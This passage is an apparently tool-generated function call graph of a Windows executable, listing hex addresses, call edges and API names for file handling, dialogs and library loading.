e07c87 23885->23886 23889 e07cf1 23886->23889 23961 e0a56d 23886->23961 23888 e07d50 23891 e07d92 23888->23891 23967 e0138b 74 API calls 23888->23967 23889->23888 23939 e08284 23889->23939 23891->23601 23894 e07bac 23893->23894 23896 e07bb3 23893->23896 23895 e12297 86 API calls 23894->23895 23895->23896 23898 e017ff 23897->23898 23909 e0185a __InternalCxxFrameHandler 23897->23909 23899 e01828 23898->23899 23910 e06c36 76 API calls __vswprintf_c_l 23898->23910 23900 e01887 23899->23900 23906 e01847 ___std_exception_copy 23899->23906 23902 e23e3e 22 API calls 23900->23902 23905 e0188e 23902->23905 23903 e0181e 23911 e06ca7 75 API calls 23903->23911 23905->23909 23913 e06ca7 75 API calls 23905->23913 23906->23909 23912 e06ca7 75 API calls 23906->23912 23909->23872 23910->23903 23911->23899 23912->23909 23913->23909 23915 e0ce4a __EH_prolog 23914->23915 23916 e1eb38 8 API calls 23915->23916 23917 e0ce8d 23916->23917 23918 e1eb38 8 API calls 23917->23918 23919 e0ceb1 23918->23919 23919->23880 23922 e1eb3d ___std_exception_copy 23920->23922 23921 e1eb57 23921->23882 23922->23921 23925 e1eb59 23922->23925 23935 e27a5e 7 API calls 2 library calls 23922->23935 23924 e1f5c9 23937 e2238d RaiseException 23924->23937 23925->23924 23936 e2238d RaiseException 23925->23936 23928 e1f5e6 23930 e14a80 __EH_prolog 23929->23930 23931 e1eb38 8 API calls 23930->23931 23932 e14a9c 23931->23932 23933 e07b8b 23932->23933 23938 e10e46 80 API calls 23932->23938 23933->23885 23935->23922 23936->23924 23937->23928 23938->23933 23940 e0828e __EH_prolog 23939->23940 23968 e013dc 23940->23968 23942 e082aa 23943 e082bb 23942->23943 24111 e09f42 23942->24111 23946 e082f2 23943->23946 23976 e01a04 23943->23976 24107 e01692 23946->24107 23951 e083e8 24003 e01f6d 23951->24003 23955 e083f3 23955->23946 24007 e03b2d 23955->24007 24019 e0848e 23955->24019 23956 e0a56d 7 API calls 23958 e082ee 23956->23958 23958->23946 23958->23956 23960 e08389 23958->23960 24115 e0c0c5 CompareStringW _wcslen 23958->24115 23995 e08430 23960->23995 23962 e0a582 23961->23962 23966 e0a5b0 23962->23966 24403 e0a69b 23962->24403 23964 e0a592 23965 e0a597 FindClose 23964->23965 23964->23966 23965->23966 23966->23886 23967->23891 23969 e013e1 __EH_prolog 23968->23969 23970 e0ce40 8 API calls 23969->23970 23971 e01419 23970->23971 23972 e1eb38 8 API calls 23971->23972 23975 e01474 __cftof 23971->23975 23973 e01461 23972->23973 23973->23975 24116 e0b505 23973->24116 23975->23942 23977 e01a0e __EH_prolog 23976->23977 23989 e01a61 23977->23989 23992 e01b9b 23977->23992 24132 e013ba 23977->24132 23979 e01bc7 24144 e0138b 74 API calls 23979->24144 23982 e03b2d 101 API calls 23986 e01c12 23982->23986 23983 e01bd4 23983->23982 23983->23992 23984 e01c5a 23988 e01c8d 23984->23988 23984->23992 24145 e0138b 74 API calls 23984->24145 23986->23984 23987 e03b2d 101 API calls 23986->23987 23987->23986 23988->23992 23993 e09e80 79 API calls 23988->23993 23989->23979 23989->23983 23989->23992 23990 e03b2d 101 API calls 23991 e01cde 23990->23991 23991->23990 23991->23992 23992->23958 23993->23991 24165 e0cf3d 23995->24165 23997 e08440 24169 e113d2 GetSystemTime SystemTimeToFileTime 23997->24169 23999 e083a3 23999->23951 24000 e11b66 23999->24000 24174 e1de6b 24000->24174 24004 e01f72 __EH_prolog 24003->24004 24006 e01fa6 24004->24006 24182 e019af 24004->24182 24006->23955 24008 e03b39 24007->24008 24009 e03b3d 24007->24009 24008->23955 24018 e09e80 79 API calls 24009->24018 24010 e03b4f 24011 e03b78 24010->24011 24012 e03b6a 24010->24012 24338 e0286b 101 API calls 3 library calls 24011->24338 24013 e03baa 24012->24013 24337 e032f7 89 API calls 2 library calls 24012->24337 24013->23955 24016 e03b76 24016->24013 24339 e020d7 74 API calls 24016->24339 24018->24010 24020 e08498 __EH_prolog 24019->24020 24025 e084d5 24020->24025 24030 e08513 24020->24030 24364 e18c8d 103 API calls 24020->24364 24021 e084f5 24023 e084fa 24021->24023 24024 e0851c 24021->24024 24023->24030 24365 e07a0d 152 API calls 24023->24365 24024->24030 24366 e18c8d 103 API calls 24024->24366 24025->24021 24027 e0857a 24025->24027 24025->24030 24027->24030 24340 e05d1a 24027->24340 24030->23955 24031 e08605 24031->24030 24346 e08167 24031->24346 24034 e08797 24035 e0a56d 7 API calls 24034->24035 24038 e08802 24034->24038 24035->24038 24037 e0d051 82 API calls 24044 e0885d 24037->24044 24352 e07c0d 24038->24352 24039 e0898b 24369 e02021 74 API calls 24039->24369 24040 e08992 24041 e08a5f 24040->24041 24048 e089e1 24040->24048 24045 e08ab6 24041->24045 24060 e08a6a 24041->24060 24044->24030 24044->24037 24044->24039 24044->24040 24367 e08117 84 API calls 24044->24367 24368 e02021 74 API calls 24044->24368 24052 e08a4c 24045->24052 24372 e07fc0 97 API calls 24045->24372 24046 e08b14 24049 e09105 24046->24049 24067 e08b82 24046->24067 24373 e098bc 24046->24373 24047 e08ab4 24053 e0959a 80 API calls 24047->24053 24048->24046 24048->24052 24054 e0a231 3 API calls 24048->24054 24051 e0959a 80 API calls 24049->24051 24051->24030 24052->24046 24052->24047 24053->24030 24055 e08a19 24054->24055 24055->24052 24370 e092a3 97 API calls 24055->24370 24056 e0ab1a 8 API calls 24058 e08bd1 24056->24058 24061 e0ab1a 8 API calls 24058->24061 24060->24047 24371 e07db2 101 API calls 24060->24371 24080 e08be7 24061->24080 24065 e08b70 24377 e06e98 77 API calls 24065->24377 24067->24056 24068 e08e40 24073 e08e52 24068->24073 24074 e08e66 24068->24074 24093 e08d49 24068->24093 24069 e08d18 24071 e08d8a 24069->24071 24072 e08d28 24069->24072 24070 e08cbc 24070->24068 24070->24069 24078 e08167 19 API calls 24071->24078 24075 e08d6e 24072->24075 24083 e08d37 24072->24083 24076 e09215 123 API calls 24073->24076 24077 e13377 75 API calls 24074->24077 24075->24093 24380 e077b8 111 API calls 24075->24380 24076->24093 24079 e08e7f 24077->24079 24084 e08dbd 24078->24084 24086 e13020 123 API calls 24079->24086 24080->24070 24081 e08c93 24080->24081 24087 e0981a 79 API calls 24080->24087 24081->24070 24378 e09a3c 82 API calls 24081->24378 24379 e02021 74 API calls 24083->24379 24089 e08df5 24084->24089 24090 e08de6 24084->24090 24084->24093 24086->24093 24087->24081 24382 e09155 93 API calls __EH_prolog 24089->24382 24381 e07542 85 API calls 24090->24381 24096 e08f85 24093->24096 24383 e02021 74 API calls 24093->24383 24095 e09090 24095->24049 24097 e0a4ed 3 API calls 24095->24097 24096->24049 24096->24095 24098 e0903e 24096->24098 24358 e09f09 SetEndOfFile 24096->24358 24099 e090eb 24097->24099 24359 e09da2 24098->24359 24099->24049 24384 e02021 74 API calls 24099->24384 24102 e09085 24104 e09620 77 API calls 24102->24104 24104->24095 24105 e090fb 24385 e06dcb 76 API calls _wcschr 24105->24385 24108 e016a4 24107->24108 24401 e0cee1 86 API calls 24108->24401 24112 e09f59 24111->24112 24113 e09f63 24112->24113 24402 e06d0c 78 API calls 24112->24402 24113->23943 24115->23958 24117 e0b50f __EH_prolog 24116->24117 24122 e0f1d0 82 API calls 24117->24122 24119 e0b521 24123 e0b61e 24119->24123 24122->24119 24124 e0b630 __cftof 24123->24124 24127 e110dc 24124->24127 24130 e1109e GetCurrentProcess GetProcessAffinityMask 24127->24130 24131 e0b597 24130->24131 24131->23975 24146 e01732 24132->24146 24134 e013d6 24135 e09e80 24134->24135 24137 e09e92 24135->24137 24138 e09ea5 24135->24138 24136 e09eb0 24136->23989 24137->24136 24163 e06d5b 77 API calls 24137->24163 24138->24136 24140 e09eb8 SetFilePointer 24138->24140 24140->24136 24141 e09ed4 GetLastError 24140->24141 24141->24136 24142 e09ede 24141->24142 24142->24136 24164 e06d5b 77 API calls 24142->24164 24144->23992 24145->23988 24147 e01748 24146->24147 24158 e017a0 __InternalCxxFrameHandler 24146->24158 24148 e01771 24147->24148 24159 e06c36 76 API calls __vswprintf_c_l 24147->24159 24149 e017c7 24148->24149 24155 e0178d ___std_exception_copy 24148->24155 24151 e23e3e 22 API calls 24149->24151 24153 e017ce 24151->24153 24152 e01767 24160 e06ca7 75 API calls 24152->24160 24153->24158 24162 e06ca7 75 API calls 24153->24162 24155->24158 24161 e06ca7 75 API calls 24155->24161 24158->24134 24159->24152 24160->24148 24161->24158 24162->24158 24163->24138 24164->24136 24166 e0cf4d 24165->24166 24168 e0cf54 24165->24168 24170 e0981a 24166->24170 24168->23997 24169->23999 24171 e09833 24170->24171 24173 e09e80 79 API calls 24171->24173 24172 e09865 24172->24168 24173->24172 24175 e1de78 24174->24175 24176 e0e617 53 API calls 24175->24176 24177 e1de9b 24176->24177 24178 e04092 _swprintf 51 API calls 24177->24178 24179 e1dead 24178->24179 24180 e1d4d4 16 API calls 24179->24180 24181 e11b7c 24180->24181 24181->23951 24183 e019bb 24182->24183 24184 e019bf 24182->24184 24183->24006 24187 e09e80 79 API calls 24184->24187 24185 e019d4 24188 e018f6 24185->24188 24187->24185 24189 e01945 24188->24189 24190 e01908 24188->24190 24196 e03fa3 24189->24196 24191 e03b2d 101 API calls 24190->24191 24194 e01928 24191->24194 24194->24183 24200 e03fac 24196->24200 24197 e03b2d 101 API calls 24197->24200 24198 e01966 24198->24194 24201 e01e50 24198->24201 24200->24197 24200->24198 24213 e10e08 24200->24213 24202 e01e5a __EH_prolog 24201->24202 24221 e03bba 24202->24221 24204 e01e84 24205 e01732 78 API calls 24204->24205 24209 e01f0b 24204->24209 24206 e01e9b 24205->24206 24249 e018a9 78 API calls 24206->24249 24208 e01eb3 24211 e01ebf _wcslen 24208->24211 24250 e11b84 MultiByteToWideChar 24208->24250 24209->24194 24251 e018a9 78 API calls 24211->24251 24214 e10e0f 24213->24214 24215 e10e2a 24214->24215 24219 e06c31 RaiseException _com_raise_error 24214->24219 24217 e10e3b SetThreadExecutionState 24215->24217 24220 e06c31 RaiseException _com_raise_error 24215->24220 24217->24200 24219->24215 24220->24217 24222 e03bc4 __EH_prolog 24221->24222 24223 e03bf6 24222->24223 24224 e03bda 24222->24224 24226 e03e51 24223->24226 24229 e03c22 24223->24229 24277 e0138b 74 API calls 24224->24277 24302 e0138b 74 API calls 24226->24302 24228 e03be5 24228->24204 24229->24228 24252 e13377 24229->24252 24231 e03ca3 24232 e03d2e 24231->24232 24248 e03c9a 24231->24248 24280 e0d051 24231->24280 24262 e0ab1a 24232->24262 24233 e03c9f 24233->24231 24279 e020bd 78 API calls 24233->24279 24235 e03c71 24235->24231 24235->24233 24236 e03c8f 24235->24236 24278 e0138b 74 API calls 24236->24278 24239 e03d41 24242 e03dd7 24239->24242 24243 e03dc7 24239->24243 24286 e13020 24242->24286 24266 e09215 24243->24266 24246 e03dd5 24246->24248 24295 e02021 74 API calls 24246->24295 24296 e12297 24248->24296 24249->24208 24250->24211 24251->24209 24253 e1338c 24252->24253 24255 e13396 ___std_exception_copy 24252->24255 24303 e06ca7 75 API calls 24253->24303 24256 e134c6 24255->24256 24257 e1341c 24255->24257 24260 e13440 __cftof 24255->24260 24305 e2238d RaiseException 24256->24305 24304 e132aa 75 API calls 3 library calls 24257->24304 24260->24235 24261 e134f2 24263 e0ab28 24262->24263 24265 e0ab32 24262->24265 24264 e1eb38 8 API calls 24263->24264 24264->24265 24265->24239 24267 e0921f __EH_prolog 24266->24267 24306 e07c64 24267->24306 24270 e013ba 78 API calls 24271 e09231 24270->24271 24309 e0d114 24271->24309 24273 e09243 24274 e0928a 24273->24274 24276 e0d114 118 API calls 24273->24276 24318 e0d300 97 API calls __InternalCxxFrameHandler 24273->24318 24274->24246 24276->24273 24277->24228 24278->24248 24279->24231 24281 e0d072 24280->24281 24282 e0d084 24280->24282 24319 e0603a 82 API calls 24281->24319 24320 e0603a 82 API calls 24282->24320 24285 e0d07c 24285->24232 24287 e13052 24286->24287 24288 e13029 24286->24288 24289 e13046 24287->24289 24335 e1552f 123 API calls 2 library calls 24287->24335 24288->24289 24291 e13048 24288->24291 24292 e1303e 24288->24292 24289->24246 24334 e1624a 118 API calls 24291->24334 24321 e16cdc 24292->24321 24295->24248 24297 e122a1 24296->24297 24298 e122ba 24297->24298 24301 e122ce 24297->24301 24336 e10eed 86 API calls 24298->24336 24300 e122c1 24300->24301 24302->24228 24303->24255 24304->24260 24305->24261 24307 e0b146 GetVersionExW 24306->24307 24308 e07c69 24307->24308 24308->24270 24311 e0d12a __InternalCxxFrameHandler 24309->24311 24310 e0d29a 24312 e0d2ce 24310->24312 24313 e0d0cb 6 API calls 24310->24313 24311->24310 24315 e18c8d 103 API calls 24311->24315 24316 e0d291 24311->24316 24317 e0ac05 91 API calls 24311->24317 24314 e10e08 SetThreadExecutionState RaiseException 24312->24314 24313->24312 24314->24316 24315->24311 24316->24273 24317->24311 24318->24273 24319->24285 24320->24285 24322 e1359e 75 API calls 24321->24322 24329 e16ced __InternalCxxFrameHandler 24322->24329 24323 e0d114 118 API calls 24323->24329 24324 e170fe 24325 e15202 98 API calls 24324->24325 24326 e1710e __InternalCxxFrameHandler 24325->24326 24326->24289 24327 e111cf 81 API calls 24327->24329 24328 e13e0b 118 API calls 24328->24329 24329->24323 24329->24324 24329->24327 24329->24328 24330 e17153 118 API calls 24329->24330 24331 e10f86 88 API calls 24329->24331 24332 e1390d 98 API calls 24329->24332 24333 e177ef 123 API calls 24329->24333 24330->24329 24331->24329 24332->24329 24333->24329 24334->24289 24335->24289 24336->24300 24337->24016 24338->24016 24339->24013 24341 e05d2a 24340->24341 24386 e05c4b 24341->24386 24343 e05d95 24343->24031 24344 e05d5d 24344->24343 24391 e0b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24344->24391 24347 e08186 24346->24347 24348 e08232 24347->24348 24398 e0be5e 19 API calls __InternalCxxFrameHandler 24347->24398 24397 e11fac CharUpperW 24348->24397 24351 e0823b 24351->24034 24353 e07c22 24352->24353 24354 e07c5a 24353->24354 24399 e06e7a 74 API calls 24353->24399 24354->24044 24356 e07c52 24400 e0138b 74 API calls 24356->24400 24358->24098 24360 e09db3 24359->24360 24363 e09dc2 24359->24363 24361 e09db9 FlushFileBuffers 24360->24361 24360->24363 24361->24363 24362 e09e3f SetFileTime 24362->24102 24363->24362 24364->24025 24365->24030 24366->24030 24367->24044 24368->24044 24369->24040 24370->24052 24371->24047 24372->24052 24374 e08b5a 24373->24374 24375 e098c5 GetFileType 24373->24375 24374->24067 24376 e02021 74 API calls 24374->24376 24375->24374 24376->24065 24377->24067 24378->24070 24379->24093 24380->24093 24381->24093 24382->24093 24383->24096 24384->24105 24385->24049 24392 e05b48 24386->24392 24389 e05b48 2 API calls 24390 e05c6c 24389->24390 24390->24344 24391->24344 24393 e05b52 24392->24393 24395 e05c3a 24393->24395 24396 e0b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24393->24396 24395->24389 24395->24390 24396->24393 24397->24351 24398->24348 24399->24356 24400->24354 24402->24113 24404 e0a6a8 24403->24404 24405 e0a6c1 FindFirstFileW 24404->24405 24406 e0a727 FindNextFileW 24404->24406 24407 e0a6d0 24405->24407 24413 e0a709 24405->24413 24408 e0a732 GetLastError 24406->24408 24406->24413 24409 e0bb03 GetCurrentDirectoryW 24407->24409 24408->24413 24410 e0a6e0 24409->24410 24411 e0a6e4 FindFirstFileW 24410->24411 24412 e0a6fe GetLastError 24410->24412 24411->24412 24411->24413 24412->24413 24413->23964 24423 e1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24414->24423 24416 e1a5cd 24417 e1a5d9 24416->24417 24424 e1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24416->24424 24417->23608 24417->23610 24419->23609 24420->23618 24421->23618 24422->23621 24423->24416 24424->24417 24425->23628 24427 e09f42 78 API calls 24426->24427 24428 e01fe8 24427->24428 24429 e01a04 101 API calls 24428->24429 24432 e02005 24428->24432 24430 e01ff5 24429->24430 24430->24432 24433 e0138b 74 API calls 24430->24433 24432->23637 24432->23638 24433->24432 24435 e1b583 GetMessageW 24434->24435 24436 e1b5bc GetDlgItem 24434->24436 24437 e1b599 IsDialogMessageW 24435->24437 24438 e1b5a8 TranslateMessage DispatchMessageW 24435->24438 24436->23648 24436->23649 24437->24436 24437->24438 24438->24436 24439 e013e1 84 API calls 2 library calls 25312 e194e0 GetClientRect 25348 e121e0 26 API calls std::bad_exception::bad_exception 25374 e1f2e0 46 API calls __RTC_Initialize 25375 e2bee0 GetCommandLineA GetCommandLineW 24441 e1eae7 24442 e1eaf1 24441->24442 24445 e1e85d 24442->24445 24471 e1e5bb 24445->24471 24447 e1e86d 24448 e1e8ca 24447->24448 24452 e1e8ee 24447->24452 24449 e1e7fb DloadReleaseSectionWriteAccess 6 API calls 24448->24449 24450 e1e8d5 RaiseException 24449->24450 24451 e1eac3 24450->24451 24453 e1e966 LoadLibraryExA 24452->24453 24454 e1e9c7 24452->24454 24459 e1e9d9 24452->24459 24467 e1ea95 24452->24467 24453->24454 24455 e1e979 GetLastError 24453->24455 24454->24459 24460 e1e9d2 FreeLibrary 24454->24460 24456 e1e9a2 24455->24456 24457 e1e98c 24455->24457 24461 e1e7fb DloadReleaseSectionWriteAccess 6 API calls 24456->24461 24457->24454 24457->24456 24458 e1ea37 GetProcAddress 24462 e1ea47 GetLastError 24458->24462 24458->24467 24459->24458 24459->24467 24460->24459 24463 e1e9ad RaiseException 24461->24463 24464 e1ea5a 24462->24464 24463->24451 24466 e1e7fb DloadReleaseSectionWriteAccess 6 API calls 24464->24466 24464->24467 24468 e1ea7b RaiseException 24466->24468 24480 e1e7fb 24467->24480 24469 e1e5bb ___delayLoadHelper2@8 6 API calls 24468->24469 24470 e1ea92 24469->24470 24470->24467 24472 e1e5c7 24471->24472 24473 e1e5ed 24471->24473 24488 e1e664 24472->24488 24473->24447 24475 e1e5cc 24476 e1e5e8 24475->24476 24491 e1e78d 24475->24491 24496 e1e5ee GetModuleHandleW GetProcAddress GetProcAddress 24476->24496 24479 e1e836 24479->24447 24481 e1e80d 24480->24481 24482 e1e82f 24480->24482 24483 e1e664 DloadReleaseSectionWriteAccess 3 API calls 24481->24483 24482->24451 24484 e1e812 24483->24484 24485 e1e82a 24484->24485 24486 e1e78d DloadProtectSection 3 API calls 24484->24486 24499 e1e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24485->24499 24486->24485 24497 e1e5ee GetModuleHandleW GetProcAddress GetProcAddress 24488->24497 24490 e1e669 24490->24475 24494 e1e7a2 DloadProtectSection 24491->24494 24492 e1e7a8 24492->24476 24493 e1e7dd VirtualProtect 24493->24492 24494->24492 24494->24493 24498 e1e6a3 VirtualQuery GetSystemInfo 24494->24498 24496->24479 24497->24490 24498->24493 24499->24482 25313 e1f4e7 29 API calls _abort 25349 e0f1e8 FreeLibrary 25350 e095f0 80 API calls 25351 e1fd4f 9 API calls 2 library calls 25376 e05ef0 82 API calls 24506 e298f0 24514 e2adaf 24506->24514 24510 e2990c 24511 e29919 24510->24511 24522 e29920 11 API calls 24510->24522 24513 e29904 24523 e2ac98 24514->24523 24517 e2adee TlsAlloc 24518 e2addf 24517->24518 24519 e1fbbc CatchGuardHandler 5 API calls 24518->24519 24520 e298fa 24519->24520 24520->24513 24521 e29869 20 API calls 2 library calls 24520->24521 24521->24510 24522->24513 24524 e2acc8 24523->24524 24528 e2acc4 24523->24528 24524->24517 24524->24518 24525 e2ace8 24525->24524 24527 e2acf4 GetProcAddress 24525->24527 24529 e2ad04 __dosmaperr 24527->24529 24528->24524 24528->24525 24530 e2ad34 24528->24530 24529->24524 24531 e2ad55 LoadLibraryExW 24530->24531 24536 e2ad4a 24530->24536 24532 e2ad72 GetLastError 24531->24532 24533 e2ad8a 24531->24533 24532->24533 24534 e2ad7d LoadLibraryExW 24532->24534 24535 e2ada1 FreeLibrary 24533->24535 24533->24536 24534->24533 24535->24536 24536->24528 24538 e2abf0 24540 e2abfb 24538->24540 24541 e2ac24 24540->24541 24542 e2ac20 24540->24542 24544 e2af0a 24540->24544 24551 e2ac50 DeleteCriticalSection 24541->24551 24545 e2ac98 __dosmaperr 5 API calls 24544->24545 24546 e2af31 24545->24546 24547 e2af4f InitializeCriticalSectionAndSpinCount 24546->24547 24550 e2af3a 24546->24550 24547->24550 24548 e1fbbc CatchGuardHandler 5 API calls 24549 e2af66 24548->24549 24549->24540 24550->24548 24551->24542 25314 e288f0 7 API calls ___scrt_uninitialize_crt 25316 e22cfb 38 API calls 4 library calls 25353 e1b5c0 100 API calls 25391 e177c0 118 API calls 25392 e1ffc0 RaiseException _com_raise_error _com_error::_com_error 24576 e1dec2 24577 e1decf 24576->24577 24578 e0e617 53 API calls 24577->24578 24579 e1dedc 24578->24579 24580 e04092 _swprintf 51 API calls 24579->24580 24581 e1def1 SetDlgItemTextW 24580->24581 24582 e1b568 5 API calls 24581->24582 24583 e1df0e 24582->24583 25377 e162ca 123 API calls __InternalCxxFrameHandler 24591 e1e1d1 14 API calls ___delayLoadHelper2@8 25318 e1f4d3 20 API calls 25394 e2a3d0 21 API calls 2 library calls 25395 e32bd0 VariantClear 24594 e010d5 24599 e05abd 24594->24599 24600 e05ac7 __EH_prolog 24599->24600 24601 e0b505 84 API calls 24600->24601 24602 e05ad3 24601->24602 24606 e05cac GetCurrentProcess GetProcessAffinityMask 24602->24606 24607 e1e2d7 24608 e1e1db 24607->24608 24609 e1e85d ___delayLoadHelper2@8 14 API calls 24608->24609 24609->24608 25380 e20ada 51 API calls 2 library calls 25319 e1dca1 DialogBoxParamW 25396 e1f3a0 27 API calls 25322 e2a4a0 71 API calls _free 25323 e308a0 IsProcessorFeaturePresent 25355 e1eda7 48 API calls _unexpected 25397 e06faa 111 API calls 3 library calls 25357 e1b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24808 e1f3b2 24809 e1f3be __FrameHandler3::FrameUnwindToState 24808->24809 24840 e1eed7 24809->24840 24811 e1f3c5 24812 e1f518 24811->24812 24815 e1f3ef 24811->24815 24913 e1f838 4 API calls 2 library calls 24812->24913 24814 e1f51f 24906 e27f58 24814->24906 24822 e1f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24815->24822 24851 e28aed 24815->24851 24825 e1f48f 24822->24825 24909 e27af4 38 API calls 2 library calls 24822->24909 24823 e1f40e 24859 e1f953 GetStartupInfoW __cftof 24825->24859 24827 e1f495 24860 e28a3e 51 API calls 24827->24860 24830 e1f49d 24861 e1df1e 24830->24861 24834 e1f4b1 24834->24814 24835 e1f4b5 24834->24835 24836 e1f4be 24835->24836 24911 e27efb 28 API calls _abort 24835->24911 24912 e1f048 12 API calls ___scrt_uninitialize_crt 24836->24912 24839 e1f4c6 24839->24823 24841 e1eee0 24840->24841 24915 e1f654 IsProcessorFeaturePresent 24841->24915 24843 e1eeec 24916 e22a5e 24843->24916 24845 e1eef5 24845->24811 24846 e1eef1 24846->24845 24924 e28977 24846->24924 24849 e1ef0c 24849->24811 24852 e28b04 24851->24852 24853 e1fbbc CatchGuardHandler 5 API calls 24852->24853 24854 e1f408 24853->24854 24854->24823 24855 e28a91 24854->24855 24856 e28ac0 24855->24856 24857 e1fbbc CatchGuardHandler 5 API calls 24856->24857 24858 e28ae9 24857->24858 24858->24822 24859->24827 24860->24830 25017 e10863 24861->25017 24865 e1df3d 25066 e1ac16 24865->25066 24867 e1df46 __cftof 24868 e1df59 GetCommandLineW 24867->24868 24869 e1dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24868->24869 24870 e1df68 24868->24870 24871 e04092 _swprintf 51 API calls 24869->24871 25070 e1c5c4 24870->25070 24873 e1e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24871->24873 25081 e1b6dd LoadBitmapW 24873->25081 24875 e1dfe0 25075 e1dbde 24875->25075 24876 e1df76 OpenFileMappingW 24878 e1dfd6 CloseHandle 24876->24878 24879 e1df8f MapViewOfFile 24876->24879 24878->24869 24883 e1dfa0 __InternalCxxFrameHandler 24879->24883 24884 e1dfcd UnmapViewOfFile 24879->24884 24888 e1dbde 2 API calls 24883->24888 24884->24878 24890 e1dfbc 24888->24890 24889 e190b7 8 API calls 24891 e1e0aa DialogBoxParamW 24889->24891 24890->24884 24892 e1e0e4 24891->24892 24893 e1e0f6 Sleep 24892->24893 24894 e1e0fd 24892->24894 24893->24894 24897 e1e10b 24894->24897 25111 e1ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24894->25111 24896 e1e12a DeleteObject 24898 e1e146 24896->24898 24899 e1e13f DeleteObject 24896->24899 24897->24896 24900 e1e177 24898->24900 24901 e1e189 24898->24901 24899->24898 25112 e1dc3b 6 API calls 24900->25112 25108 e1ac7c 24901->25108 24904 e1e17d CloseHandle 24904->24901 24905 e1e1c3 24910 e1f993 GetModuleHandleW 24905->24910 25242 e27cd5 24906->25242 24909->24825 24910->24834 24911->24836 24912->24839 24913->24814 24915->24843 24928 e23b07 24916->24928 24919 e22a67 24919->24846 24921 e22a6f 24922 e22a7a 24921->24922 24942 e23b43 DeleteCriticalSection 24921->24942 24922->24846 24971 e2c05a 24924->24971 24927 e22a7d 7 API calls 2 library calls 24927->24845 24929 e23b10 24928->24929 24931 e23b39 24929->24931 24932 e22a63 24929->24932 24943 e23d46 24929->24943 24948 e23b43 DeleteCriticalSection 24931->24948 24932->24919 24934 e22b8c 24932->24934 24964 e23c57 24934->24964 24937 e22ba1 24937->24921 24939 e22baf 24940 e22bbc 24939->24940 24970 e22bbf 6 API calls ___vcrt_FlsFree 24939->24970 24940->24921 24942->24919 24949 e23c0d 24943->24949 24946 e23d7e InitializeCriticalSectionAndSpinCount 24947 e23d69 24946->24947 24947->24929 24948->24932 24950 e23c26 24949->24950 24954 e23c4f 24949->24954 24950->24954 24956 e23b72 24950->24956 24953 e23c3b GetProcAddress 24953->24954 24955 e23c49 24953->24955 24954->24946 24954->24947 24955->24954 24961 e23b7e ___vcrt_InitializeCriticalSectionEx 24956->24961 24957 e23bf3 24957->24953 24957->24954 24958 e23b95 LoadLibraryExW 24959 e23bb3 GetLastError 24958->24959 24960 e23bfa 24958->24960 24959->24961 24960->24957 24962 e23c02 FreeLibrary 24960->24962 24961->24957 24961->24958 24963 e23bd5 LoadLibraryExW 24961->24963 24962->24957 24963->24960 24963->24961 24965 e23c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24964->24965 24966 e23c71 24965->24966 24967 e23c8a TlsAlloc 24966->24967 24968 e22b96 24966->24968 24968->24937 24969 e23d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24968->24969 24969->24939 24970->24937 24974 e2c073 24971->24974 24975 e2c077 24971->24975 24972 e1fbbc CatchGuardHandler 5 API calls 24973 e1eefe 24972->24973 24973->24849 24973->24927 24974->24972 24975->24974 24977 e2a6a0 24975->24977 24978 e2a6ac __FrameHandler3::FrameUnwindToState 24977->24978 24989 e2ac31 EnterCriticalSection 24978->24989 24980 e2a6b3 24990 e2c528 24980->24990 24982 e2a6c2 24988 e2a6d1 24982->24988 25003 e2a529 29 API calls 24982->25003 24985 e2a6cc 25004 e2a5df GetStdHandle GetFileType 24985->25004 24986 e2a6e2 _abort 24986->24975 25005 e2a6ed LeaveCriticalSection _abort 24988->25005 24989->24980 24991 e2c534 __FrameHandler3::FrameUnwindToState 24990->24991 24992 e2c541 24991->24992 24993 e2c558 24991->24993 25014 e291a8 20 API calls __dosmaperr 24992->25014 25006 e2ac31 EnterCriticalSection 24993->25006 24996 e2c546 25015 e29087 26 API calls _abort 24996->25015 24998 e2c550 _abort 24998->24982 24999 e2c590 25016 e2c5b7 LeaveCriticalSection _abort 24999->25016 25000 e2c564 25000->24999 25007 e2c479 25000->25007 25003->24985 25004->24988 25005->24986 25006->25000 25008 e2b136 __dosmaperr 20 API calls 25007->25008 25010 e2c48b 25008->25010 25009 e2c498 25011 e28dcc _free 20 API calls 25009->25011 25010->25009 25012 e2af0a 11 API calls 25010->25012 25013 e2c4ea 25011->25013 25012->25010 25013->25000 25014->24996 25015->24998 25016->24998 25018 e1ec50 25017->25018 25019 e1086d GetModuleHandleW 25018->25019 25020 e108e7 25019->25020 25021 e10888 GetProcAddress 25019->25021 25022 e10c14 GetModuleFileNameW 25020->25022 25122 e275fb 42 API calls __vsnwprintf_l 25020->25122 25023 e108a1 25021->25023 25024 e108b9 GetProcAddress 25021->25024 25033 e10c32 25022->25033 25023->25024 25025 e108cb 25024->25025 25025->25020 25027 e10b54 25027->25022 25028 e10b5f GetModuleFileNameW CreateFileW 25027->25028 25029 e10c08 CloseHandle 25028->25029 25030 e10b8f SetFilePointer 25028->25030 25029->25022 25030->25029 25031 e10b9d ReadFile 25030->25031 25031->25029 25035 e10bbb 25031->25035 25036 e10c94 GetFileAttributesW 25033->25036 25038 e10c5d CompareStringW 25033->25038 25039 e10cac 25033->25039 25113 e0b146 25033->25113 25116 e1081b 25033->25116 25035->25029 25037 e1081b 2 API calls 25035->25037 25036->25033 25036->25039 25037->25035 25038->25033 25040 e10cb7 25039->25040 25042 e10cec 25039->25042 25043 e10cd0 GetFileAttributesW 25040->25043 25044 e10ce8 25040->25044 25041 e10dfb 25065 e1a64d GetCurrentDirectoryW 25041->25065 25042->25041 25045 e0b146 GetVersionExW 25042->25045 25043->25040 25043->25044 25044->25042 25046 e10d06 25045->25046 25047 e10d73 25046->25047 25048 e10d0d 25046->25048 25049 e04092 _swprintf 51 API calls 25047->25049 25050 e1081b 2 API calls 25048->25050 25051 e10d9b AllocConsole 25049->25051 25052 e10d17 25050->25052 25053 e10df3 ExitProcess 25051->25053 25054 